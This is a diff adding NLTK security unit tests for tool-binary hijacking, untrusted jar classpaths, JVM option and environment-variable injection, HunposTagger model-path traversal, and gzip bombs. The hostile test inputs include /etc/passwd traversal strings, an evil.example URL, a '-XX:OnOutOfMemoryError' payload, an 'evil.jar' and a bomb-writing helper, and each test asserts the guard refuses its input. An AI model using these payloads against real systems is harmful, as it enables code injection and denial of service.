+    # 'foobar' has two 'o's, so two bracket pairs appear.
+    assert out.getvalue().count("{") == 2
+
+    tree = ParentedTree.fromstring("(S (NP the) (VP (V saw) (NP him)))")
+    # tgrep_nodes yields one hit-list per input tree; this tree has two NP nodes.
+    matched = list(tgrep_nodes(tgrep_compile("NP"), [tree]))
+    assert len(matched) == 1
+    assert len(matched[0]) == 2
+
+
+def test_benign_reviews_features_extraction_preserved():
+    import re
+
+    from nltk.corpus.reader.reviews import FEATURES
+
+    # The inner quantifier is greedy, so the run before a "[+N]" bracket extends
+    # back through intervening words ("and screen"), which is the shipped
+    # behaviour; the point here is that extraction still works and stays bounded.
+    assert FEATURES.findall("battery life[+2] and screen[-1] are notable") == [
+        ("battery life", "+2"),
+        ("and screen", "-1"),
+    ]
+    # The shipped pattern is the bounded-quantifier one.
+    assert "{0,50}" in FEATURES.pattern
+    assert re is not None
+
+
+def test_benign_zip_extract_roundtrip():
+    import io
+
+    from nltk import pathsec
+
+    buf = io.BytesIO()
+    with pathsec.ZipFile(buf, "w", __import__("zipfile").ZIP_DEFLATED) as z:
+        z.writestr("greeting.txt", b"hello world")
+        z.writestr("nested/data.txt", b"payload")
+    blob = buf.getvalue()
+    zf = pathsec.ZipFile(io.BytesIO(blob))
+    assert zf.read("greeting.txt") == b"hello world"
+    assert zf.read("nested/data.txt") == b"payload"
+
+
+def test_benign_skipgrams_parse_stem_outputs():
+    from nltk import CFG
+    from nltk.parse import RecursiveDescentParser
+    from nltk.stem.snowball import HungarianStemmer
+    from nltk.util import skipgrams
+
+    assert list(skipgrams("a b c".split(), 2, 1)) == [
+        ("a", "b"),
+        ("a", "c"),
+        ("b", "c"),
+    ]
+    grammar = CFG.fromstring("S -> NP VP\nNP -> 'John'\nVP -> 'runs'")
+    trees = list(RecursiveDescentParser(grammar).parse(["John", "runs"]))
+    assert [str(t) for t in trees] == ["(S (NP John) (VP runs))"]
+    stemmer = HungarianStemmer()
+    assert stemmer.stem("") == ""
+    assert isinstance(stemmer.stem("hazaknak"), str)
+
+
+# ==========================================================================
+# No-weakening pins: the guard knobs must stay at their safe defaults
+# ==========================================================================
+
+
+def test_guard_constants_not_weakened():
+    import nltk.data as D
+    from nltk import redos
+
+    assert D.MAX_UNZIP_RATIO == 1000, "MAX_UNZIP_RATIO was changed"
+    assert D.MAX_UNZIP_MEMBERS == 100_000, "MAX_UNZIP_MEMBERS was changed"
+    assert D.MAX_UNZIP_ACTIVATION == 32 * 1024 * 1024, "MAX_UNZIP_ACTIVATION changed"
+    # A None hard cap is the shipped default; a *positive* cap is also fine, but a
+    # zero / negative cap would disable the ratio path, so guard against that.
+    assert D.MAX_UNZIP_SIZE is None or D.MAX_UNZIP_SIZE > 0
+    assert redos.DEFAULT_TIMEOUT == 5.0, "redos.DEFAULT_TIMEOUT was changed"
+    # The guard callables are present.
+    for fn in (
+        "_check_decompression_bomb",
+        "_check_zip_member_count",
+        "_check_zip_total_size",
+        "_bounded_stream_read",
+        "_bounded_gzip_decompress",
+    ):
+        assert callable(getattr(D, fn)), f"{fn} missing"
+
+
+if __name__ == "__main__":  # pragma: no cover
+    sys.exit(pytest.main([__file__, "-v"]))

--- a/nltk/test/unit/test_attack_java_tool_expanded.py
+++ b/nltk/test/unit/test_attack_java_tool_expanded.py
@@ -1,0 +1,654 @@
+"""Expanded JAVA / BINARY / external-tool injection harness (GHSA-8mgp umbrella).
+
+This file ADDS net-new external-tool attack vectors that the existing suite does
+not already cover, and proves for each one that a hostile input is REFUSED and a
+benign input is accepted. It deliberately avoids re-running vectors already owned
+by:
+
+* ``test_java_per_call_options_security.py`` (the ~90-vector option allowlist,
+  the classpath sandbox matrix, and the child-env sanitisation, all at the
+  ``internals.java()`` layer);
+* ``test_java_injection_exploit.py`` (live-RCE-marker proofs, single-entry jar
+  sandbox, MaltParser end-to-end);
+* ``test_malt_stanford_pathsec.py`` / ``test_pathsec_sweep_wrappers.py`` (malt
+  and stanford ``-model`` / ``corenlp_options`` coercion and traversal);
+* ``test_pathsec_io_attack_matrix.py`` / ``test_pathsec_tool_resources.py`` (the
+  guard-level path matrix and hostile PathLike / str-subclass objects);
+* ``test_senna_security.py`` / ``test_weka_security.py`` / ``test_malt_security.py``
+  (senna/weka/malt tool-discovery hijacks).
+
+The genuinely-open surfaces this file targets are:
+
+1. the generic ``internals.find_binary`` / ``find_file`` / ``find_dir``
+   CWD-relative bare-name refusal, with a "teeth" proof that the raw iterator
+   really does yield the untrusted CWD match the wrapper then drops (CWE-426/427);
+2. the ``HunposTagger`` wrapper, which is not exercised by any file above and is
+   a full binary-hijack + model-path + argv-coercion surface;
+3. multi-entry classpath *shadowing* (an attacker jar prepended OR appended to a
+   list of trusted jars) at the ``internals.java()`` layer;
+4. tool program-flags (the Stanford ``-model`` / ``-loadClassifier`` arguments)
+   fed into the JVM *option* channel, which the allowlist must reject because a
+   value that IS an option is never a valid JVM flag;
+5. a Stanford parser ``model_path`` that is itself an option token, refused at
+   the single JVM hand-off before any process is spawned;
+6. the child-env gate, asserted dynamically over the whole configured
+   ``_JVM_INJECTING_ENV_VARS`` set so it self-updates.
+
+Every hostile assertion either raises ``(PermissionError, ValueError,
+UntrustedJarError, LookupError)`` OR proves the JVM/exec sentinel was never
+invoked, i.e. the injected token never reached argv. No guard in ``nltk/*.py`` is
+modified by this file.
+
+Fixtures stage the trusted data root and the untrusted "outside" dir under the
+real ``$HOME`` (never a shared temp dir), because a private per-user system temp
+is itself a trusted pathsec root on macOS. POSIX-only vectors (symlink, mode) and
+Windows-only vectors (reserved device names) are guarded with skip markers so the
+file is green on Linux, macOS and Windows.
+"""
+
+import os
+import pathlib
+import shutil
+import subprocess
+import tempfile
+import uuid
+from types import SimpleNamespace
+
+import pytest
+
+import nltk.data
+from nltk import internals, pathsec
+
+POSIX_ONLY = pytest.mark.skipif(
+    os.name != "posix", reason="symlink / mode / device-file vectors are POSIX-specific"
+)
+WINDOWS_ONLY = pytest.mark.skipif(
+    os.name == "posix",
+    reason="reserved device names are only special on Windows",
+)
+
+
+# =========================================================================== #
+# Fixtures and helpers
+# =========================================================================== #
+@pytest.fixture
+def atk_root(monkeypatch):
+    """Pin ``nltk.data.path`` to ONE fresh trusted root and expose an untrusted
+    ``outside`` dir, both under the real ``$HOME``.
+
+    A private per-user system temp dir (``/var/folders/...`` on macOS) is itself
+    an allowed pathsec root, so staging under ``$HOME`` (registering only
+    ``root``) is the portable way to have a location that is genuinely OUTSIDE
+    every trusted root on Linux/macOS/Windows alike.
+    """
+    home = str(pathlib.Path.home())
+    root = os.path.realpath(tempfile.mkdtemp(prefix=".nltk_atk_root_", dir=home))
+    outside = os.path.realpath(tempfile.mkdtemp(prefix=".nltk_atk_out_", dir=home))
+    monkeypatch.setattr(pathsec, "ENFORCE", True)
+    monkeypatch.setattr(nltk.data, "path", [root])
+    # Invalidate the memoised allowed-roots so the new single root takes effect.
+    monkeypatch.setattr(pathsec, "_ALLOWED_ROOTS_CACHE", None, raising=False)
+    monkeypatch.setattr(pathsec, "_LAST_DATA_PATHS", None, raising=False)
+    try:
+        yield SimpleNamespace(root=root, outside=outside)
+    finally:
+        shutil.rmtree(root, ignore_errors=True)
+        shutil.rmtree(outside, ignore_errors=True)
+
+
+@pytest.fixture
+def java_spy(monkeypatch):
+    """Replace ``subprocess.Popen`` with a spy that records every argv (and the
+    child ``env``) and never launches a real process. A blocked exploit must
+    leave the recorded call list empty, proving the injected token never reached
+    the process layer."""
+    calls = []
+
+    class _FakeProc:
+        returncode = 0
+
+        def communicate(self, *a, **k):
+            return "", ""
+
+    def _fake_popen(cmd, *a, **k):
+        calls.append(SimpleNamespace(argv=list(cmd), env=k.get("env")))
+        return _FakeProc()
+
+    monkeypatch.setattr(internals, "_java_bin", "java")
+    monkeypatch.setattr(internals, "_java_options", [])
+    monkeypatch.setattr(subprocess, "Popen", _fake_popen)
+    monkeypatch.setattr(internals.subprocess, "Popen", _fake_popen)
+    return calls
+
+
+def _regular_file(dirpath, name, content="data"):
+    """Create and return the path to a real regular file (what the tool guards
+    require: not a symlink, FIFO, device, or directory)."""
+    p = os.path.join(dirpath, name)
+    with open(p, "w") as fh:
+        fh.write(content)
+    return p
+
+
+class _LyingStr(str):
+    """A ``str`` subclass whose inspection methods lie about the payload it holds.
+
+    ``os.fspath`` hands a str subclass back unchanged, so a guard that reasoned
+    over ``self`` would run the attacker's overridden ``startswith`` /
+    ``__contains__`` / ``replace`` and be fooled. ``_as_path_text`` defeats this
+    by re-extracting the real characters via ``str.__str__``."""
+
+    def startswith(self, *a, **k):
+        return False
+
+    def __contains__(self, _item):
+        return False
+
+    def replace(self, *a, **k):
+        return _LyingStr("")
+
+
+class _MutatingFspath:
+    """``__fspath__`` returns a benign in-root path the first time and a hostile
+    one afterwards, modelling the TOCTOU where a guard validates one file and the
+    tool opens another."""
+
+    def __init__(self, first, rest):
+        self._answers = [first, rest]
+        self.calls = 0
+
+    def __fspath__(self):
+        answer = self._answers[min(self.calls, 1)]
+        self.calls += 1
+        return answer
+
+
+# =========================================================================== #
+# 1. Tool-discovery hijack: find_binary / find_file / find_dir (CWE-426/427)
+#    Net-new: the generic discovery helpers are only reached indirectly by other
+#    files (through malt/senna/repp). Here they are attacked directly, with a
+#    "teeth" proof that the raw iterator really yields the CWD-relative match.
+# =========================================================================== #
+class TestToolDiscoveryHijack:
+    def test_find_binary_bare_name_resolving_only_to_cwd_is_refused(
+        self, monkeypatch, tmp_path
+    ):
+        """A bare tool name that exists ONLY as a CWD-relative file must not be
+        run: a returned relative path is executed from the current directory, so
+        an attacker who can write the CWD would choose the binary (CWE-426)."""
+        monkeypatch.chdir(tmp_path)
+        name = "tool_" + uuid.uuid4().hex  # guaranteed absent from PATH
+        _regular_file(str(tmp_path), name)
+
+        with pytest.raises(LookupError):
+            internals.find_binary(name, env_vars=(), searchpath=())
+
+        # Teeth: the raw iterator DOES surface the untrusted CWD-relative match,
+        # so find_binary's wrapper, not a lucky miss, is what refuses it.
+        raw = list(internals.find_file_iter(name, (), ()))
+        assert any(not os.path.isabs(m) for m in raw), raw
+
+    def test_find_binary_bare_path_to_bin_is_not_an_explicit_choice(
+        self, monkeypatch, tmp_path
+    ):
+        """A bare ``path_to_bin`` (no directory component) is NOT an explicit path:
+        a planted ``./<name>`` must still be refused, or ``bin='java'`` could be
+        hijacked by a CWD ``./java``."""
+        monkeypatch.chdir(tmp_path)
+        name = "hunbin_" + uuid.uuid4().hex
+        _regular_file(str(tmp_path), name)
+        with pytest.raises(LookupError):
+            internals.find_binary(name, path_to_bin=name, env_vars=(), searchpath=())
+
+    def test_find_file_bare_name_resolving_only_to_cwd_is_refused(
+        self, monkeypatch, tmp_path
+    ):
+        monkeypatch.chdir(tmp_path)
+        name = "model_" + uuid.uuid4().hex
+        _regular_file(str(tmp_path), name)
+
+        with pytest.raises(LookupError):
+            internals.find_file(name, env_vars=(), searchpath=())
+
+        raw = list(internals.find_file_iter(name, (), ()))
+        assert any(not os.path.isabs(m) for m in raw), raw
+
+    def test_find_dir_bare_name_resolving_to_a_relative_env_dir_is_refused(
+        self, monkeypatch, tmp_path
+    ):
+        """``find_dir`` yields the value of a configured env var; a relative value
+        (``.``) is a CWD-relative directory and must be refused for a bare name."""
+        monkeypatch.chdir(tmp_path)
+        var = "NLTK_ATK_DIR_" + uuid.uuid4().hex
+        monkeypatch.setenv(var, ".")  # a relative (CWD) directory
+        name = "corpora_" + uuid.uuid4().hex
+
+        with pytest.raises(LookupError):
+            internals.find_dir(name, env_vars=(var,))
+
+        raw = list(internals.find_file_iter(name, (var,), (), finding_dir=True))
+        assert any(not os.path.isabs(m) for m in raw), raw
+
+    def test_absolute_search_hit_shadows_a_planted_cwd_binary(
+        self, monkeypatch, tmp_path
+    ):
+        """PATH-shadowing resilience: with BOTH a planted CWD-relative match and a
+        trusted absolute searchpath hit, find_binary must return the absolute one,
+        never the attacker's CWD copy."""
+        cwd = tmp_path / "cwd"
+        good = tmp_path / "trusted_bin"
+        cwd.mkdir()
+        good.mkdir()
+        monkeypatch.chdir(cwd)
+        name = "shadow_" + uuid.uuid4().hex
+        planted = _regular_file(str(cwd), name)  # CWD-relative decoy
+        trusted = _regular_file(str(good), name)  # absolute searchpath hit
+
+        resolved = internals.find_binary(name, env_vars=(), searchpath=(str(good),))
+        assert os.path.isabs(resolved)
+        assert os.path.realpath(resolved) == os.path.realpath(trusted)
+        assert os.path.realpath(resolved) != os.path.realpath(planted)
+
+    def test_explicit_directory_component_is_honoured(self, monkeypatch, tmp_path):
+        """A name WITH a directory component is the caller's explicit choice and is
+        returned as given (benign control that the refusal is not over-broad)."""
+        monkeypatch.chdir(tmp_path)
+        sub = tmp_path / "tools"
+        sub.mkdir()
+        _regular_file(str(sub), "prover9")
+        resolved = internals.find_file(
+            os.path.join("tools", "prover9"), env_vars=(), searchpath=()
+        )
+        assert resolved == os.path.join("tools", "prover9")
+
+    def test_absolute_path_to_bin_is_accepted(self, monkeypatch, tmp_path):
+        """Benign control: an absolute binary is an explicit choice and honoured."""
+        monkeypatch.chdir(tmp_path)
+        target = _regular_file(str(tmp_path), "realbin")
+        resolved = internals.find_binary(
+            "realbin", path_to_bin=target, env_vars=(), searchpath=()
+        )
+        assert resolved == target
+
+
+# =========================================================================== #
+# 2. Multi-entry classpath shadowing (CWE-94). Net-new: the existing sandbox
+#    matrix tests single entries; here an attacker jar is PREPENDED / APPENDED to
+#    a list of otherwise-trusted jars and must poison the whole classpath.
+# =========================================================================== #
+class TestClasspathShadowing:
+    def _jars(self, atk_root):
+        a = _regular_file(atk_root.root, "trusted_a.jar")
+        b = _regular_file(atk_root.root, "trusted_b.jar")
+        evil = _regular_file(atk_root.outside, "evil.jar")
+        return a, b, evil
+
+    def test_attacker_jar_prepended_to_trusted_jars_is_refused(
+        self, atk_root, java_spy
+    ):
+        a, b, evil = self._jars(atk_root)
+        with pytest.raises(internals.UntrustedJarError):
+            internals.java(["Main"], classpath=[evil, a, b])
+        assert java_spy == [], "untrusted jar reached the process layer"
+
+    def test_attacker_jar_appended_to_trusted_jars_is_refused(self, atk_root, java_spy):
+        a, b, evil = self._jars(atk_root)
+        with pytest.raises(internals.UntrustedJarError):
+            internals.java(["Main"], classpath=[a, b, evil])
+        assert java_spy == []
+
+    def test_cwd_relative_entry_mixed_with_trusted_jars_is_refused(
+        self, atk_root, java_spy
+    ):
+        a, _b, _evil = self._jars(atk_root)
+        with pytest.raises(internals.UntrustedJarError):
+            internals.java(["Main"], classpath=[a, "." + os.sep + "evil.jar"])
+        assert java_spy == []
+
+    @POSIX_ONLY
+    def test_in_root_symlink_to_outside_jar_is_refused(self, atk_root, java_spy):
+        """An in-root classpath entry that is a symlink to an outside jar is
+        refused: ``realpath`` sees the true (outside) inode (CWE-59)."""
+        a, _b, evil = self._jars(atk_root)
+        link = os.path.join(atk_root.root, "link.jar")
+        os.symlink(evil, link)
+        with pytest.raises(internals.UntrustedJarError):
+            internals.java(["Main"], classpath=[a, link])
+        assert java_spy == []
+
+    def test_multi_entry_sandbox_is_load_bearing(self, atk_root, java_spy, monkeypatch):
+        """Teeth (mentally revert the guard): with ``_verify_jar_sandbox`` neutered
+        the SAME mixed list reaches the process layer with the outside jar on the
+        classpath, proving it is the sandbox, not some later check, that refuses
+        the shadowing list above."""
+        a, _b, evil = self._jars(atk_root)
+        monkeypatch.setattr(internals, "_verify_jar_sandbox", lambda entries: None)
+        internals.java(["Main"], classpath=[a, evil])
+        assert len(java_spy) == 1
+        cp_value = java_spy[0].argv[java_spy[0].argv.index("-cp") + 1]
+        assert evil in cp_value.split(os.pathsep)
+
+    def test_trusted_multi_jar_classpath_reaches_popen_cleanly(
+        self, atk_root, java_spy
+    ):
+        """Benign control: several in-root jars build a ``-cp`` joined with the
+        platform separator, with NO empty (CWD) element, and reach the JVM."""
+        a, b, _evil = self._jars(atk_root)
+        internals.java(["Main"], classpath=[a, b])
+        assert len(java_spy) == 1
+        argv = java_spy[0].argv
+        assert argv[0] == "java" and "-cp" in argv and "Main" in argv
+        cp_value = argv[argv.index("-cp") + 1]
+        assert cp_value == os.pathsep.join([a, b])
+        assert "" not in cp_value.split(os.pathsep)
+
+
+# =========================================================================== #
+# 3. A value that IS an option in the JVM option channel. Net-new: the existing
+#    allowlist tests feed real JVM-ish flags; here we feed the *tool's own*
+#    program-flags, which must also be rejected (they are not JVM flags).
+# =========================================================================== #
+# Stanford/CoreNLP/malt PROGRAM arguments, never JVM launcher flags; if one
+# reached the option channel it would sit before the main class.
+_TOOL_FLAGS = [
+    ["-model"],
+    ["--outputFormat"],
+    ["-loadClassifier"],
+    ["-encoding"],
+    ["-props"],
+    ["-textFile"],
+    ["-serDictionary"],
+    ["-sentences", "newline"],
+]
+
+
+class TestToolFlagInOptionChannel:
+    @pytest.mark.parametrize("opts", _TOOL_FLAGS)
+    def test_tool_program_flag_is_rejected_by_the_option_allowlist(
+        self, opts, java_spy
+    ):
+        with pytest.raises(ValueError):
+            internals.java(["Main"], classpath=None, options=opts)
+        assert java_spy == []
+
+    def test_benign_allowlist_options_pass_and_reach_popen_in_order(self, java_spy):
+        """Benign control: a spread of allowlisted flags validate AND reach the
+        JVM in the order given, so the guard is not simply rejecting everything."""
+        safe = ["-Xss8m", "-verbose:class", "--add-modules", "java.se", "-client"]
+        internals._validate_java_options(safe)  # does not raise
+        internals.java(["Main"], classpath=None, options=safe)
+        assert len(java_spy) == 1
+        argv = java_spy[0].argv
+        for flag in ("-Xss8m", "-verbose:class", "--add-modules", "java.se", "-client"):
+            assert flag in argv
+        assert argv.index("-Xss8m") < argv.index("Main")
+
+
+# =========================================================================== #
+# 4. HunposTagger: an entirely uncovered external-tool wrapper.
+#    hunpos uses a raw subprocess (NOT the JVM), so its defenses are the
+#    find_binary CWD refusal on the executable and validate_tool_path on the
+#    model; both are attacked here, with the process call trapped by a sentinel.
+# =========================================================================== #
+class _HunposSentinel(Exception):
+    """Raised by the trapped Popen so a test can tell "argv was built and handed
+    off" apart from "a guard refused first" without launching hunpos-tag."""
+
+
+@pytest.fixture
+def hunpos_env(monkeypatch, atk_root):
+    """Wire HunposTagger so the executable resolves to a staged in-root binary and
+    the real ``validate_tool_path`` model gate is the surface under test; the
+    process spawn is trapped and its argv recorded."""
+    from nltk.tag import hunpos as hp
+
+    fake_bin = _regular_file(atk_root.root, "hunpos-tag")
+    captured = {}
+
+    def fake_find_binary(*a, **k):
+        return fake_bin
+
+    def fake_find_file(path_to_model, *a, **k):
+        # Pass the caller's model through UNCHANGED so validate_tool_path (the
+        # real guard, left un-patched) is what accepts or refuses it.
+        return path_to_model
+
+    def fake_popen(cmd, *a, **k):
+        captured["argv"] = list(cmd)
+        raise _HunposSentinel
+
+    monkeypatch.setattr(hp, "find_binary", fake_find_binary)
+    monkeypatch.setattr(hp, "find_file", fake_find_file)
+    monkeypatch.setattr(hp, "Popen", fake_popen)
+    return SimpleNamespace(root=atk_root, bin=fake_bin, captured=captured)
+
+
+_HOSTILE_HUNPOS_MODELS = [
+    "../../../etc/passwd",  # traversal out of the namespace
+    "/etc/passwd",  # absolute, outside every root
+    "http://evil.example/model",  # URL, not a local path
+    "file:///etc/passwd",  # file URL
+    "-loadClassifier",  # option-shaped (argument injection)
+    "model\x00.bin",  # NUL truncates in the tool's native layer
+]
+
+
+class TestHunposToolInjection:
+    def _make(self, model, **kw):
+        from nltk.tag import HunposTagger
+
+        return HunposTagger(model, **kw)
+
+    @pytest.mark.parametrize("model", _HOSTILE_HUNPOS_MODELS)
+    def test_hostile_model_is_refused_before_the_process_spawns(
+        self, hunpos_env, model
+    ):
+        with pytest.raises((PermissionError, ValueError)):
+            self._make(model)
+        assert "argv" not in hunpos_env.captured, "process spawned with hostile model"
+
+    def test_out_of_root_absolute_model_that_exists_is_still_refused(self, hunpos_env):
+        """A model that is a REAL file but lives outside the roots is refused: the
+        containment check, not mere existence, is what matters."""
+        outside_model = _regular_file(hunpos_env.root.outside, "en_wsj.model")
+        with pytest.raises((PermissionError, ValueError)):
+            self._make(outside_model)
+        assert "argv" not in hunpos_env.captured
+
+    def test_lying_str_subclass_model_cannot_hide_its_payload(self, hunpos_env):
+        payload = os.path.join(hunpos_env.root.outside, "en_wsj.model")
+        _regular_file(hunpos_env.root.outside, "en_wsj.model")
+        with pytest.raises((PermissionError, ValueError)):
+            self._make(_LyingStr(payload))
+        assert "argv" not in hunpos_env.captured
+
+    @pytest.mark.parametrize("bogus", [None, ["/etc/passwd"], 3.14])
+    def test_non_path_model_is_a_clean_security_rejection(self, hunpos_env, bogus):
+        """A non-str/bytes model is a clean ``PermissionError``, not a TypeError
+        that would escape a caller's ``except (PermissionError, ValueError)``."""
+        with pytest.raises((PermissionError, ValueError)):
+            self._make(bogus)
+        assert "argv" not in hunpos_env.captured
+
+    @WINDOWS_ONLY
+    def test_reserved_windows_device_model_is_refused(self, hunpos_env):
+        with pytest.raises((PermissionError, ValueError)):
+            self._make("NUL")
+        assert "argv" not in hunpos_env.captured
+
+    def test_bare_cwd_relative_binary_is_refused(self, monkeypatch, tmp_path, atk_root):
+        """The hunpos executable itself: a bare ``path_to_bin`` resolvable only in
+        the CWD must be refused (CWE-426). find_binary is NOT stubbed here."""
+        from nltk.tag import HunposTagger
+
+        monkeypatch.chdir(tmp_path)
+        bin_name = "hunbin_" + uuid.uuid4().hex  # absent from PATH
+        _regular_file(str(tmp_path), bin_name)
+        model = _regular_file(atk_root.root, "en_wsj.model")
+        with pytest.raises(LookupError):
+            HunposTagger(model, path_to_bin=bin_name)
+
+    def test_model_guard_is_load_bearing(self, hunpos_env, monkeypatch):
+        """Teeth (mentally revert the guard): with ``validate_tool_path`` neutered,
+        an out-of-root model reaches the process spawn as argv[1], proving it is
+        the model guard that refuses the hostile models above, not a later step."""
+        from nltk.tag import hunpos as hp
+
+        outside_model = _regular_file(hunpos_env.root.outside, "en_wsj.model")
+        monkeypatch.setattr(hp, "validate_tool_path", lambda value, **k: value)
+        with pytest.raises(_HunposSentinel):
+            self._make(outside_model)
+        assert hunpos_env.captured["argv"] == [hunpos_env.bin, outside_model]
+
+    def test_benign_in_root_model_builds_the_expected_argv(self, hunpos_env):
+        """Benign control: an in-root model and the staged binary build exactly the
+        two-element ``[binary, model]`` argv and reach the (trapped) spawn."""
+        model = _regular_file(hunpos_env.root.root, "en_wsj.model")
+        with pytest.raises(_HunposSentinel):
+            self._make(model)
+        assert hunpos_env.captured["argv"] == [hunpos_env.bin, model]
+
+
+# =========================================================================== #
+# 4b. Argv coercion: a value-mutating ``__fspath__`` must be frozen to its first
+#     answer, and callers must build argv from the RETURNED string. Net-new
+#     angle: asserts the return-value contract directly and shows a re-read would
+#     have opened a different (hostile) file.
+# =========================================================================== #
+class TestArgvCoercionFrozenFspath:
+    def test_mutating_fspath_is_frozen_and_the_return_is_the_safe_value(self, atk_root):
+        good = _regular_file(atk_root.root, "model.ser.gz")
+        evil = os.path.join(atk_root.outside, "passwd")
+        obj = _MutatingFspath(good, evil)
+
+        returned = pathsec.validate_tool_path(obj, context="frozen-fspath")
+
+        # The guard captured only the FIRST (safe, in-root) answer and returns it.
+        assert returned == good
+        # Teeth: the object now answers with the hostile path, so a caller that
+        # re-read ``obj`` instead of using ``returned`` would hand the tool a file
+        # the guard never saw. Building argv from ``returned`` is what stays safe.
+        assert os.fspath(obj) == evil
+        assert obj.calls >= 2
+
+    def test_mutating_fspath_that_starts_hostile_is_refused(self, atk_root):
+        evil_first = os.path.join(atk_root.outside, "passwd")
+        good = _regular_file(atk_root.root, "model.ser.gz")
+        obj = _MutatingFspath(evil_first, good)
+        with pytest.raises((PermissionError, ValueError)):
+            pathsec.validate_tool_path(obj, context="frozen-fspath")
+
+
+# =========================================================================== #
+# 5. Stanford parser: a model_path that is itself an option token is refused at
+#    the single JVM hand-off, before any process is spawned. Net-new angle: the
+#    existing files cover /etc/passwd + traversal for -model, not option-shaped.
+# =========================================================================== #
+class TestStanfordParserModelIsAnOption:
+    def _stub_parser(self, monkeypatch, model_path, atk_root):
+        from nltk.parse import stanford as st
+        from nltk.parse.stanford import GenericStanfordParser
+
+        p = GenericStanfordParser.__new__(GenericStanfordParser)
+        p.model_path = model_path
+        p._encoding = "utf8"
+        p.corenlp_options = ""
+        p.java_options = "-mx1g"
+        p._classpath = (_regular_file(atk_root.root, "stanford.jar"),)
+
+        reached = {}
+
+        def fake_java(*a, **k):
+            reached["hit"] = True
+            return "", ""
+
+        monkeypatch.setattr(st, "java", fake_java)
+        return p, reached
+
+    @pytest.mark.parametrize("model", ["-model", "-loadClassifier", "--outputFormat"])
+    def test_option_shaped_model_path_is_refused_before_java(
+        self, monkeypatch, atk_root, model
+    ):
+        p, reached = self._stub_parser(monkeypatch, model, atk_root)
+        with pytest.raises((ValueError, PermissionError)):
+            p._execute([p._MAIN_CLASS, "-model", model], "input")
+        assert "hit" not in reached, "java() was reached with an option-shaped model"
+
+    def test_out_of_root_absolute_model_path_is_refused_before_java(
+        self, monkeypatch, atk_root
+    ):
+        outside = _regular_file(atk_root.outside, "englishPCFG.ser.gz")
+        p, reached = self._stub_parser(monkeypatch, outside, atk_root)
+        with pytest.raises((ValueError, PermissionError)):
+            p._execute([p._MAIN_CLASS, "-model", outside], "input")
+        assert "hit" not in reached
+
+    def test_default_jar_internal_resource_still_validates(self):
+        """Benign control: the documented jar-internal default resource is a bare
+        resource name and is returned unchanged (not sandboxed as a path)."""
+        resource = "edu/stanford/nlp/models/lexparser/englishPCFG.ser.gz"
+        assert pathsec.validate_model_resource(resource) == resource
+
+
+# =========================================================================== #
+# 6. Child-env gate: a poisoned parent env cannot inject into the child JVM.
+#    Net-new angle: asserted dynamically over the WHOLE configured injecting-var
+#    set so it self-updates, and proven end-to-end via the env handed to Popen.
+# =========================================================================== #
+class TestChildEnvGate:
+    def test_every_configured_injecting_var_is_stripped_control_survives(
+        self, monkeypatch
+    ):
+        payload = "-XX:OnOutOfMemoryError=touch /tmp/nltk_env_pwned"
+        for var in internals._JVM_INJECTING_ENV_VARS:
+            monkeypatch.setenv(var, payload)
+        monkeypatch.setenv("NLTK_ATK_KEEP", "keepme")
+
+        child = internals._java_child_env()
+
+        for var in internals._JVM_INJECTING_ENV_VARS:
+            assert var not in child, f"{var} leaked into the child JVM environment"
+        assert payload not in child.values()
+        assert child.get("NLTK_ATK_KEEP") == "keepme"
+        assert "PATH" in child or os.name != "posix"
+
+    def test_poisoned_parent_env_is_stripped_from_the_env_handed_to_popen(
+        self, atk_root, java_spy, monkeypatch
+    ):
+        """End-to-end: with the parent env poisoned, the env dict java() hands to
+        Popen carries none of the injecting vars, so the child JVM cannot read
+        JAVA_TOOL_OPTIONS et al. (CWE-88)."""
+        good = _regular_file(atk_root.root, "trusted.jar")
+        for var in internals._JVM_INJECTING_ENV_VARS:
+            monkeypatch.setenv(var, "-XX:OnError=touch /tmp/pwned")
+        internals.java(["Main"], classpath=good)
+        assert len(java_spy) == 1
+        child_env = java_spy[0].env
+        assert child_env is not None, "java() must hand Popen an explicit env"
+        for var in internals._JVM_INJECTING_ENV_VARS:
+            assert var not in child_env
+
+
+# =========================================================================== #
+# 7. Senna: a relative senna_path (incl. PathLike form) must not be resolved
+#    against the CWD. Net-new form: the PathLike spelling of the CWE-426 vector.
+# =========================================================================== #
+class TestSennaRelativePath:
+    def test_relative_pathlike_senna_dir_is_rejected(self, monkeypatch, tmp_path):
+        """A relative ``Path('.')`` must fall through to the (absolute-only) SENNA
+        env var rather than run a ``./senna-<platform>`` from the CWD (CWE-426)."""
+        from nltk.classify import Senna
+
+        monkeypatch.chdir(tmp_path)
+        monkeypatch.delenv("SENNA", raising=False)
+        # Plant a decoy for every platform's expected binary name in the CWD.
+        for name in (
+            "senna-linux64",
+            "senna-linux32",
+            "senna-win32.exe",
+            "senna-osx",
+            "senna",
+        ):
+            _regular_file(str(tmp_path), name)
+        with pytest.raises(LookupError):
+            Senna(pathlib.Path("."), ["pos"])

--- a/nltk/test/unit/test_attack_path_sandbox_expanded.py
+++ b/nltk/test/unit/test_attack_path_sandbox_expanded.py
@@ -41,6 +41,7 @@ itself an allowed root on macOS) via the conftest ``sandbox`` / ``pathsec_sandbo
 fixtures.
 """
 
+import gzip
 import os
 import stat
 import tempfile
@@ -536,3 +537,76 @@ class TestEnforceTeeth:
         monkeypatch.setattr(pathsec, "_LAST_DATA_PATHS", None, raising=False)
         # validate_tool_path returns the checked string (no raise) under ENFORCE off.
         assert validate_tool_path(outside_file) == outside_file
+
+
+# ==========================================================================
+# 9. Public-API gzip bomb, aggregate bomb via the open/read path, and the
+#    POSIX benign-literal over-block guard (net-new read paths)
+# ==========================================================================
+# Section 6 isolates the single-member read cutoff. Here the gzip bomb is driven
+# through the public GzipFileSystemPathPointer.open (not _BoundedGzipFile
+# directly) and the aggregate bomb through ZipFile.open().read() (not
+# extraction), so both public read paths are proven to fail closed, and an
+# honest gzip is proven to still round-trip.
+
+
+def _gzip_bomb(root, name="pointer_bomb.gz", size=200 * 1024 * 1024):
+    archive = os.path.join(str(root), name)
+    with gzip.open(archive, "wb") as handle:
+        handle.write(b"\0" * size)
+    return archive
+
+
+class TestGzipAndAggregateThroughPublicReadPaths:
+    def test_gzip_bomb_refused_through_public_pointer_open(self, restricted_sandbox):
+        archive = _gzip_bomb(restricted_sandbox)
+        pointer = nltk.data.GzipFileSystemPathPointer(archive)
+        with pytest.raises(REFUSALS):
+            with pointer.open() as stream:
+                while stream.read(1024 * 1024):
+                    pass
+
+    def test_benign_gzip_roundtrips_through_public_pointer(self, restricted_sandbox):
+        # Over-block control: an honest gzip reads back byte for byte.
+        archive = os.path.join(str(restricted_sandbox), "honest.gz")
